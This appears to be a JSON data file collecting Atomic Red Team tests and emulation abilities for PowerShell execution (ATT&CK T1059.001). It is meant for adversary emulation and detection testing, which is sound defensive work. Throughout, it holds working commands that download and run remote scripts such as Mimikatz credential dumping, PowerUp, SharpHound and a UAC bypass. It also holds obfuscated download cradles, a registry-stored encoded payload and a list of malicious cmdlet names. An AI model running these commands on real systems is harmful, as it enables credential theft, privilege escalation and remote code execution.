\"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;", + "source": "data/abilities/collection/55678719-e76e-4df9-92aa-10655bbd1cf4.yml", + "name": "User enumeration" + }, + { + "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";", + "source": "data/abilities/collection/702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml", + "name": "System Information Gathering Script" + }, + { + "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty 
Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n", + "source": "data/abilities/defense-evasion/e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml", + "name": "Copy powershell to non-standard location and perform triage commands" + }, + { + "command": "Get-Process -Name \"powershell\" | Stop-Process\n", + "source": "data/abilities/execution/134b49a3-3f93-41bd-85f4-563eadbb6055.yml", + "name": "Kill all PowerShell processes" + }, + { + "command": "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "source": "data/abilities/execution/315cedf1-4a3a-4015-b63f-149d64bacbbc.yml", + "name": "Emulate administrator tasks on a system in a separate process" + }, + { + "command": "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml", + "name": "Run an application as a different user" + }, + { + "command": "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n", + "source": "data/abilities/execution/bfff9006-d1fb-46ce-b173-92cb04e9a031.yml", + "name": "Download" + }, + { + "command": "powershell -enc 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\n", + "source": "data/abilities/execution/ccdb8caf-c69e-424b-b930-551969450c57.yml", + "name": "Download" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.001", + "display_name": "Command and Scripting Interpreter: PowerShell", + "atomic_tests": [ + { + "name": "Mimikatz", + "auto_generated_guid": "f3132740-55bc-48c4-bcc0-758a459cd027", 
+ "description": "Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mimurl": { + "description": "Mimikatz url", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1" + } + }, + "executor": { + "command": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds\"\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Run BloodHound from local disk", + "auto_generated_guid": "a21bb23e-e677-4ee7-af90-6931b57b6350", + "description": "Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.\n\nSuccessful execution will produce stdout message stating \"SharpHound Enumeration Completed\". 
Upon completion, final output will be a *BloodHound.zip file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for SharpHound payload", + "type": "String", + "default": "PathToAtomicsFolder\\T1059.001\\src" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "SharpHound.ps1 must be located at #{file_path}\n", + "prereq_command": "if (Test-Path #{file_path}\\SharpHound.ps1) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\" -OutFile \"#{file_path}\\SharpHound.ps1\"\n" + } + ], + "executor": { + "command": "write-host \"Import and Execution of SharpHound.ps1 from #{file_path}\" -ForegroundColor Cyan\nimport-module #{file_path}\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "cleanup_command": "Remove-Item $env:Temp\\*BloodHound.zip -Force\n", + "name": "powershell" + } + }, + { + "name": "Run Bloodhound from Memory using Download Cradle", + "auto_generated_guid": "bf8c1441-4674-4dab-8e4e-39d93d08f9b7", + "description": "Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.\n\nSuccessful execution will produce stdout message stating \"SharpHound Enumeration Completed\". 
Upon completion, final output will be a *BloodHound.zip file.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "cleanup_command": "Remove-Item $env:Temp\\*BloodHound.zip -Force\n", + "name": "powershell" + } + }, + { + "name": "Obfuscation Tests", + "auto_generated_guid": "4297c41a-8168-4138-972d-01f3ee92c804", + "description": "Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: \"SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION\"\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( 
''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + "name": "powershell" + } + }, + { + "name": "Mimikatz - Cradlecraft PsSendKeys", + "auto_generated_guid": "af1800cf-9f9d-4fd1-a709-14b1e6de020d", + "description": "Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable 
_).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Invoke-AppPathBypass", + "auto_generated_guid": "06a220b6-7e29-4bd8-9d07-5b4d86742372", + "description": "Note: Windows 10 only. Upon execution windows backup and restore window will be opened.\n\nBypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell MsXml COM object - with prompt", + "auto_generated_guid": "388a7340-dbc1-4c9d-8e59-b75ad8c6d5da", + "description": "Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, \"Download Cradle test success!\" will be displayed.\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1" + } + }, + "executor": { + "command": "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell XML requests", + "auto_generated_guid": "4396927f-e503-427b-b023-31049b9b09a6", + "description": "Powershell xml download request. 
Upon execution, \"Download Cradle test success!\" will be dispalyed.\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml" + } + }, + "executor": { + "command": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell invoke mshta.exe download", + "auto_generated_guid": "8a2ad40b-12c7-4b25-8521-2737b0a415af", + "description": "Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display \"Download Cradle test success!\".\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct" + } + }, + "executor": { + "command": "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell Invoke-DownloadCradle", + "auto_generated_guid": "cc50fa2a-a4be-42af-a88f-e347ba0bf4d7", + "description": "Provided by https://github.com/mgreen27/mgreen27.github.io\nInvoke-DownloadCradle is used to generate Network and Endpoint artifacts.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "1. Open Powershell_ise as a Privileged Account\n2. 
Invoke-DownloadCradle.ps1\n", + "name": "manual" + } + }, + { + "name": "PowerShell Fileless Script Execution", + "auto_generated_guid": "fa050f5e-bc75-4230-af73-b6fd7852cd73", + "description": "Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open \"C:\\Windows\\Temp\" and verify that\nart-marker.txt is in the folder.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "cleanup_command": "Remove-Item -path C:\\Windows\\Temp\\art-marker.txt -Force -ErrorAction Ignore\nRemove-Item HKCU:\\Software\\Classes\\AtomicRedTeam -Force -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "PowerShell Downgrade Attack", + "auto_generated_guid": "9148e7c4-9356-420e-a416-e896e9c0f73e", + "description": "This test requires the manual installation of PowerShell V2.\n\nAttempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "PowerShell version 2 must be installed\n", + "prereq_command": "if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Automated installer not implemented yet, please install PowerShell v2 manually\n" + } + ], + "executor": { + "command": "powershell.exe -version 2 -Command 
Write-Host $PSVersion\n", + "name": "powershell" + } + }, + { + "name": "NTFS Alternate Data Stream Access", + "auto_generated_guid": "8e5c5532-1181-4c1d-bb79-b3a9f5dbd680", + "description": "Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, \"Stream Data Executed\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ads_file": { + "description": "File created to store Alternate Stream Data", + "type": "String", + "default": "$env:TEMP\\NTFS_ADS.txt" + } + }, + "dependencies": [ + { + "description": "Homedrive must be an NTFS drive\n", + "prereq_command": "if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains \"NTFS\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Prereq's for this test cannot be met automatically\n" + } + ], + "executor": { + "name": "powershell", + "command": "Add-Content -Path #{ads_file} -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "cleanup_command": "Remove-Item #{ads_file} -Force -ErrorAction Ignore\n" + } + }, + { + "name": "PowerShell Session Creation and Use", + "auto_generated_guid": "7c1acec2-78fa-4305-a3e0-db2a54cddecd", + "description": "Connect to a remote powershell session and interact with the host.\nUpon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hostname_to_connect": { + "description": "The host to connect to, by default it will connect to the local machine", + "type": "String", + "default": "$env:COMPUTERNAME" + } + }, + "dependencies": [ + { + "description": "PSRemoting must be enabled\n", + "prereq_command": "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n", + 
"get_prereq_command": "Enable-PSRemoting\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-PSSession -ComputerName #{hostname_to_connect}\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -Command parameter variations", + "auto_generated_guid": "686a9785-f99b-41d4-90df-66ed515f81d7", + "description": "Executes powershell.exe with variations of the -Command parameter", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "command_param_variation": { + "description": "The \"Command\" parameter variation to use", + "type": "String", + "default": "C" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments", + "auto_generated_guid": "1c0a870f-dc74-49cf-9afc-eccc45e58790", 
+ "description": "Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "command_param_variation": { + "description": "The \"Command\" parameter variation to use", + "type": "String", + "default": "C" + }, + "encoded_arguments_param_variation": { + "description": "The \"EncodedArguments\" parameter variation to use", + "type": "String", + "default": "EA" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -EncodedCommand parameter variations", + "auto_generated_guid": "86a43bad-12e3-4e85-b97c-4d5cf25b95c3", + "description": "Executes powershell.exe with variations of the -EncodedCommand parameter", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "encoded_command_param_variation": { + "description": "The \"EncodedCommand\" 
parameter variation to use", + "type": "String", + "default": "E" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments", + "auto_generated_guid": "0d181431-ddf3-4826-8055-2dbf63ae848b", + "description": "Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "encoded_command_param_variation": { + "description": "The \"EncodedCommand\" parameter variation to use", + "type": "String", + "default": "E" + }, + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "encoded_arguments_param_variation": { + "description": "The \"EncodedArguments\" parameter variation to use", + "type": "String", + "default": "EncodedArguments" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not 
$RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "PowerShell Command Execution", + "auto_generated_guid": "a538de64-1c74-46ed-aa60-b995ed302598", + "description": "Use of obfuscated PowerShell to execute an arbitrary command; outputs \"Hello, from PowerShell!\". Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "obfuscated_code": { + "description": "Defaults to: Invoke-Expression with a \"Write-Host\" line.", + "type": "String", + "default": "JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==" + } + }, + "executor": { + "command": "powershell.exe -e #{obfuscated_code}\n", + "name": "command_prompt" + } + }, + { + "name": "PowerShell Invoke Known Malicious Cmdlets", + "auto_generated_guid": "49eb9404-5e0f-4031-a179-b40f7be385e3", + "description": "Powershell execution of known Malicious PowerShell Cmdlets", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Malicious_cmdlets": { + "description": "Known Malicious Cmdlets", + "type": "String", + "default": "\"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", 
\"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", \"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n" + } + }, + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$malcmdlets = #{Malicious_cmdlets}\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n" + } + }, + { + "name": "PowerUp Invoke-AllChecks", + "auto_generated_guid": "1289f78d-22d2-4590-ac76-166737e1811b", + "description": "Check for privilege escalation paths using PowerUp from PowerShellMafia\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "name": "powershell" + } + } + ] + }, + { + "id": "55678719-e76e-4df9-92aa-10655bbd1cf4", + "description": "User enumeration", + "name": "cmd.exe information gathering", + "tactic": "collection", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> 
C:\\Windows\\temp\\history.log;" + } + } + } + }, + { + "id": "702bfdd2-9947-4eda-b551-c3a1ea9a59a2", + "description": "System Information Gathering Script", + "name": "PowerShell information gathering", + "tactic": "collection", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";" + } + } + } + }, + { + "id": "e5f9de8f-3df1-4e78-ad92-a784e3f6770d", + "name": "Move Powershell & triage", + "description": "Copy powershell to non-standard location and perform triage commands", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1059.001", + "name": "PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n" + } + } + } + }, + { + "id": "134b49a3-3f93-41bd-85f4-563eadbb6055", + "name": "Stop PowerShell processes", + "description": "Kill all PowerShell processes", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "pwsh": { + "command": "Get-Process -Name \"powershell\" | Stop-Process\n" + } + } + } + }, + { + "id": "315cedf1-4a3a-4015-b63f-149d64bacbbc", + "name": "Emulate Administrator Tasks", + "description": "Emulate administrator tasks on a system in a separate process", + "tactic": "execution", + "technique": { + 
"attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "cleanup": "Remove-Item -Force -Path \".\\Emulate-Administrator-Tasks.ps1\"\n", + "payloads": [ + "Emulate-Administrator-Tasks.ps1" + ] + } + } + } + }, + { + "id": "3796a00b-b11d-4731-b4ca-275a07d83299", + "name": "Impersonate user", + "description": "Run an application as a different user", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential 